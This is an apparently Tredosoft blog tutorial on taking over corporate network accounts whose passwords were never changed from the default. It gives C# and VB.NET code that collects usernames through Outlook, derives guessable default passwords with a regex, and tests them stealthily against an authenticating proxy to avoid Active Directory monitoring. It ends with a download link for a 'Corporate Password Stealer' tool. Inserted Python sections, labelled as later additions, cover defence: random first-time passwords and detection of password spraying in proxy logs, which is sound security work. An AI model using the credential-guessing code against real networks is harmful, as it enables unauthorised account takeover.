Stealing Corporate Login Passwords

Legal disclaimer: All the information and software contained in or linked from this page is for educational purposes only. It is illegal to use the information herein in real world situations without prior authorization from the individual users and the network administrator of your network. Tredosoft does not condone the use of this information and the linked software and shall not be held responsible for the (mis)use of this information and the linked software. This information and the linked software is available "As Is" and confers absolutely no rights whatsoever. If you do not agree leave this page immediately and do not download or use the linked software.

Take the following hypothetical situation: a network administrator creates a new account for a user in Microsoft's Exchange Server. He leaves the "Reset Password on First Login" option toggled off (which I believe is the default behavior?). The user receives his or her new password and never feels inclined to change it (why should they?). This creates a possible attack strategy: hackers can break into the network using default user credentials.

I have seen some corporate networks with extremely rigid security practices regarding user credentials. For example, one of the networks I used not only enforced resetting the password on first login but also enforced a monthly password change. Moreover, the default password was autogenerated from information not normally accessible to the public. This last rule is extremely important: a default (first-time) password must never be generated from information available to the general public. Examples of private information suitable for default passwords are the social security number, the employee number, or a combination of two pieces of private information such as the birth date and mobile number. Even better, why not generate a random password and pass it on to the user along with the username; after all, the user will be forced to change it on first login anyway. Some incompetent administrators not only allow the default password to remain unchanged after the first login but also generate passwords that are as insecure as passwords based on the username or passwords found in common password dictionaries.

Let's suppose I am a malicious user trying to obtain valid network credentials (perhaps with higher security permissions) from a network to which I have physical access. This network is run by an incompetent administrator who never enforces changing the default password at all. To make matters worse, she generates very weak passwords based on the usernames or on a known password dictionary list.

The first thing I would need is a list of valid usernames. If I am on an Active Directory network, I would fire up Outlook and parse all the e-mail addresses from the "Global Contact List". To do that programmatically, I would first add all the contacts from the global contact list to my own contact list and then connect to Outlook via .NET/COM to automate the process. We will demonstrate with .NET code how this can be achieved.

// C#
// You must add a reference to the Outlook interop assembly (Microsoft.Office.Interop.Outlook)
using System;
using System.Collections;
using Microsoft.Office.Interop.Outlook;

class Program
{
  static void Main(string[] args)
  {
    //open outlook and get the local contact list folder
    Application outlook = new Application();
    NameSpace ons = outlook.GetNamespace("MAPI");
    MAPIFolder ofolder = ons.GetDefaultFolder(OlDefaultFolders.olFolderContacts);

    //Storing a username list is as easy as
    ArrayList userlist = new ArrayList();
    foreach (ContactItem ci in ofolder.Items)   // the folder is assumed to hold contacts only
      userlist.Add(ci.Email1Address);           // e-mail address of each contact
    for (int i = 0; i < userlist.Count; i++)
      Console.WriteLine("Username: {0}", userlist[i]);
  }
}

' VB.NET
' You must add a reference to the Outlook interop assembly (Microsoft.Office.Interop.Outlook)
Imports System
Imports System.Collections
Imports Microsoft.Office.Interop.Outlook

Module Program
  Sub Main()
    'open outlook and get the local contact list folder
    Dim outlook As New Application()
    Dim ons As NameSpace = outlook.GetNamespace("MAPI")
    Dim ofolder As MAPIFolder = ons.GetDefaultFolder(OlDefaultFolders.olFolderContacts)

    'Storing a username list is as easy as
    Dim userlist As New ArrayList()
    For Each ci As ContactItem In ofolder.Items   ' the folder is assumed to hold contacts only
      userlist.Add(ci.Email1Address)              ' e-mail address of each contact
    Next
    For i As Integer = 0 To userlist.Count - 1
      Console.WriteLine("Username: {0}", userlist(i))
    Next
  End Sub
End Module

Some of you are probably thinking "you could have used the classes in System.DirectoryServices to iterate the usernames". We simply don't want to assume that our computer is logged in to an Active Directory domain (or could log in to one).

Once we have a list of usernames we need to think of an attack strategy based on the information available to us. As discussed earlier, an incompetent network administrator could generate a default password from the username itself using a fixed rule. For example, some administrators use the last five letters of the username as the default password; so if the username is "imauser" we could guess that the password, if never changed, would be "auser". Alternatively, we could guess the password from a password dictionary, but that could lead to a false positive regarding the incompetence of the network administrator (it is possible that the user changed the default password to a weak password that exists in our dictionary, which is not the point of this article). Guessing the password from a fixed rule is achieved programmatically by text processing the usernames. We shall use regular expressions for their intuitive nature. First we create a regular expression that captures portions of the username so they can be used to reconstruct the default password. For example, the following regular expression captures the last five characters of a seven-character username:

// C#
using System.Text.RegularExpressions;
//                   /-username-\/-regular expression-\
Match m = Regex.Match("imauser",   "^..(.{5})$");
string thePassword = m.Groups[1].Value;   // "auser"

' VB.NET
Imports System.Text.RegularExpressions
'                          /-username-\/-regular expression-\
Dim m As Match = Regex.Match("imauser",   "^..(.{5})$")
Dim thePassword As String = m.Groups(1).Value   ' "auser"
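From the administrator's side, the two preceding points (a first-time password must be random rather than derived from public data, and "last five characters of the username" is a rule an attacker can reconstruct with one regular expression) reduce to a small provisioning policy. The following Python is an added example written for this page, not code from the original post or from Tredosoft: it issues first-time passwords from the OS CSPRNG and rejects any candidate default that is a slice of the username, contains the username, or is a common-password dictionary word with a short numeric suffix. The COMMON_PASSWORDS set, the ALPHABET and the 12-character minimum are assumptions of this example; a deployment would load the full dictionary file that the article refers to.

```python
import secrets
import string

# Constructed sample of a common-password list; a deployment would load the full
# dictionary file (one password per line) that the article refers to.
COMMON_PASSWORDS = {"password", "123456", "welcome", "letmein", "qwerty"}

# Character set for generated first-time passwords (assumption of this example).
ALPHABET = string.ascii_letters + string.digits + "!#$%&*+-=?@^_"


def generate_initial_password(length: int = 16) -> str:
    """Draw a first-time password from the OS CSPRNG via the secrets module."""
    if length < 12:
        raise ValueError("first-time passwords should be at least 12 characters")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def derived_from_username(username: str, candidate: str, min_len: int = 3) -> bool:
    """True when the candidate is a slice of the username or contains it.

    This catches fixed-rule defaults such as "the last five characters of the
    username" (imauser -> auser) as well as username-plus-suffix schemes.
    """
    u, c = username.lower(), candidate.lower()
    if len(c) < min_len:
        return True  # far too short to be a password at all
    return c in u or u in c


def is_weak_initial_password(username: str, candidate: str,
                             dictionary: set = COMMON_PASSWORDS) -> bool:
    """Reject a default password an attacker could guess from public data."""
    c = candidate.lower()
    if derived_from_username(username, candidate):
        return True
    if c in dictionary:
        return True
    # Dictionary word plus a short numeric suffix (welcome1, password2006).
    stripped = c.rstrip(string.digits)
    if stripped in dictionary and len(c) - len(stripped) <= 4:
        return True
    return False


def issue_initial_password(username: str, length: int = 16) -> str:
    """Generate a random first-time password that passes the policy above."""
    while True:
        candidate = generate_initial_password(length)
        if not is_weak_initial_password(username, candidate):
            return candidate


if __name__ == "__main__":
    for user, pw in [("imauser", "auser"), ("imauser", "Welcome1"),
                     ("imauser", issue_initial_password("imauser"))]:
        print(f"{user:10} {pw:20} weak={is_weak_initial_password(user, pw)}")
```

The username check is deliberately coarse (any substring in either direction) because the rule an administrator picks is unknown in advance; the point is that a provisioning script, not the administrator's imagination, decides what a default looks like, and the random password makes the "reset on first login" setting a second line of defence rather than the only one.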

So now we have a list of usernames and we can generate passwords for testing. How can we test them to see whether a certain user is using the default password or a dictionary password? There are many ways of doing that. You could test them manually by logging in with each username and the default password (or a password from the dictionary) until you get a match, but as you are probably thinking right now, this is a very time-consuming process. You could instead test these credentials programmatically, either by connecting to the corporate proxy server (if and only if it requires authentication) or by connecting to Active Directory. A smart hacker would probably avoid trying usernames against Active Directory because this is where a network administrator would look for suspicious activity. If proxy authentication is not enabled, you can refer to the System.DirectoryServices documentation on MSDN for ways to authenticate against an AD server. The following code shows how you can check a username and password on a proxy server regardless of the authentication method it implements (Basic/Digest/NTLM etc.):

// C#
using System.Net;

// Placeholders: TARGET_URL is any URL reachable through the proxy;
// PROXY_HOST and PROXY_PORT identify the proxy server (assumed to be known).
HttpWebRequest wr = (HttpWebRequest)WebRequest.Create(TARGET_URL);
wr.Method = "HEAD"; // To reduce bandwidth but is considered a suspicious activity
//just to be safe
wr.PreAuthenticate = true;
wr.Pipelined = false;
wr.KeepAlive = false;
wr.UnsafeAuthenticatedConnectionSharing = false; //very important if using NTLM!
//to look innocent
wr.UserAgent = "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)";
//set proxy server
WebProxy wproxy = new WebProxy(PROXY_HOST, PROXY_PORT);
//the domain name is only required if the proxy server uses NTLM authentication.------v
wproxy.Credentials = new NetworkCredential(USERNAME_TO_TEST, PASSWORD_TO_TEST, DOMAIN_NAME);
wr.Proxy = wproxy;
WebResponse wR = null;
bool goodpassword = false;
try
{
  wR = wr.GetResponse();
  goodpassword = true;
  wR.Close();
}
catch (WebException ex)
{
  //if authentication fails a WebException is raised (the proxy answers 407)
  goodpassword = false;
}
' VB.NET
Imports System.Net

' Placeholders: TARGET_URL is any URL reachable through the proxy;
' PROXY_HOST and PROXY_PORT identify the proxy server (assumed to be known).
Dim wr As HttpWebRequest = CType(WebRequest.Create(TARGET_URL), HttpWebRequest)
wr.Method = "HEAD" 'To reduce bandwidth but is considered a suspicious activity
'just to be safe
wr.PreAuthenticate = True
wr.Pipelined = False
wr.KeepAlive = False
wr.UnsafeAuthenticatedConnectionSharing = False 'very important if using NTLM!
'to look innocent
wr.UserAgent = "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)"
'set proxy server
Dim wproxy As New WebProxy(PROXY_HOST, PROXY_PORT)
'the domain name is only required if the proxy server uses NTLM authentication.----v
wproxy.Credentials = New NetworkCredential(USERNAME_TO_TEST, PASSWORD_TO_TEST, DOMAIN_NAME)
wr.Proxy = wproxy
Dim wR As WebResponse = Nothing
Dim goodpassword As Boolean = False
Try
  wR = wr.GetResponse()
  goodpassword = True
  wR.Close()
Catch ex As WebException
  'if authentication fails a WebException is raised (the proxy answers 407)
  goodpassword = False
End Try
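The paragraph above notes that the attacker moves to the proxy because the administrator watches Active Directory, and the code itself admits that HEAD requests are "considered a suspicious activity" and that the User-Agent is fixed "to look innocent". Those are exactly the signals a defender should alert on in the proxy's own log: a burst of 407 (proxy authentication required) responses from one source across many distinct usernames, all HEAD, all with one identical User-Agent. The following Python is an added example written for this page, not code from the original post or from Tredosoft. The log line format, the sample lines, the ten-minute window and the five-username threshold are all constructed assumptions of this example; a real deployment would adapt LOG_RE to the proxy's native format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format for this example (not any real proxy's native format):
#   <ISO timestamp> <source IP> <username offered> <method> <URL> <status> "<user agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<user>\S+) (?P<method>\S+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

# Constructed sample: 10.0.0.5 walks six usernames with HEAD requests in eleven
# seconds; 10.0.0.7 mistypes a password once and then succeeds; 10.0.0.9 fails
# twice for the same account (a forgotten password, not a spray).
SAMPLE_LOG = """\
2006-05-01T09:00:01 10.0.0.5 imauser HEAD http://www.example.com/ 407 "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)"
2006-05-01T09:00:03 10.0.0.5 jdoe HEAD http://www.example.com/ 407 "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)"
2006-05-01T09:00:04 10.0.0.7 asmith GET http://intranet.example.com/ 407 "Mozilla/5.0 (Windows NT 5.1)"
2006-05-01T09:00:05 10.0.0.5 asmith HEAD http://www.example.com/ 407 "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)"
2006-05-01T09:00:06 10.0.0.7 asmith GET http://intranet.example.com/ 200 "Mozilla/5.0 (Windows NT 5.1)"
2006-05-01T09:00:08 10.0.0.5 bjones HEAD http://www.example.com/ 407 "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)"
2006-05-01T09:00:10 10.0.0.5 cwhite HEAD http://www.example.com/ 407 "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)"
2006-05-01T09:00:12 10.0.0.5 dblack HEAD http://www.example.com/ 407 "Mozilla/4.0 (Compatible; IE6.0; Windows NT 5.1; SV1)"
2006-05-01T09:30:00 10.0.0.9 eparker GET http://www.example.com/ 407 "Mozilla/5.0 (Windows NT 5.1)"
2006-05-01T09:30:02 10.0.0.9 eparker GET http://www.example.com/ 407 "Mozilla/5.0 (Windows NT 5.1)"
"""


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that don't match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["status"] = int(ev["status"])
    return ev


def detect_spray(lines, window=timedelta(minutes=10), min_users=5):
    """Flag sources that offer at least min_users distinct usernames and get a
    407 for each within one sliding window. Returns one alert per source,
    describing the densest window seen for it."""
    failures = [e for e in map(parse_line, lines) if e and e["status"] == 407]
    failures.sort(key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in failures:
        by_src[e["src"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        best = None
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            span = evs[start:end + 1]
            users = {e["user"] for e in span}
            if len(users) >= min_users and (best is None or len(users) > best["distinct_users"]):
                best = {
                    "src": src,
                    "distinct_users": len(users),
                    "users": sorted(users),
                    "first": span[0]["ts"],
                    "last": span[-1]["ts"],
                    "head_only": all(e["method"] == "HEAD" for e in span),
                    "user_agents": sorted({e["ua"] for e in span}),
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_LOG.splitlines()):
        print(f"{a['src']}: {a['distinct_users']} usernames between {a['first']} "
              f"and {a['last']}; HEAD only={a['head_only']}; UAs={a['user_agents']}")
```

Keying on distinct usernames per source, rather than on failures per account, is what separates this pattern from ordinary typos: a user who forgets a password fails repeatedly on one account from one machine, while a default-password sweep fails once per account across many. The HEAD-only and single-User-Agent fields are kept in the alert as supporting evidence, not as the trigger, since a legitimate client can produce either on its own.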

I programmed a little console application as a proof-of-concept to demonstrate how easy it would be to obtain a list of usernames and passwords. It is written in C#, and there are several assumptions for the proof-of-concept to work. They are...

  • You have access to a machine connected to a local network with the .NET framework 2.0 installed.
  • You know the hostname of the proxy server and the port number.
  • The proxy server requires authentication.
  • If the network implements a proxy server with NTLM authentication, you know the user domain.
  • You have Microsoft Outlook installed and your contact list is filled with the emails of ALL users on the network.
  • If you are guessing passwords based on a regular expression, you know how to write one.
  • If you are guessing passwords based on a dictionary, you have a text file with a password on each line.
  • The code is theoretical, was never tested, and should never be tested.

[Image: corp pass (thumbnail)]

It is all straightforward; you only have to follow the instructions.

Download Tredosoft's Corporate Password Stealer. (207KB)


Wow, great. I have read many articles about this topic and every time I learn something new; I don't think it will ever stop, always new info. Thanks for all of your hard work!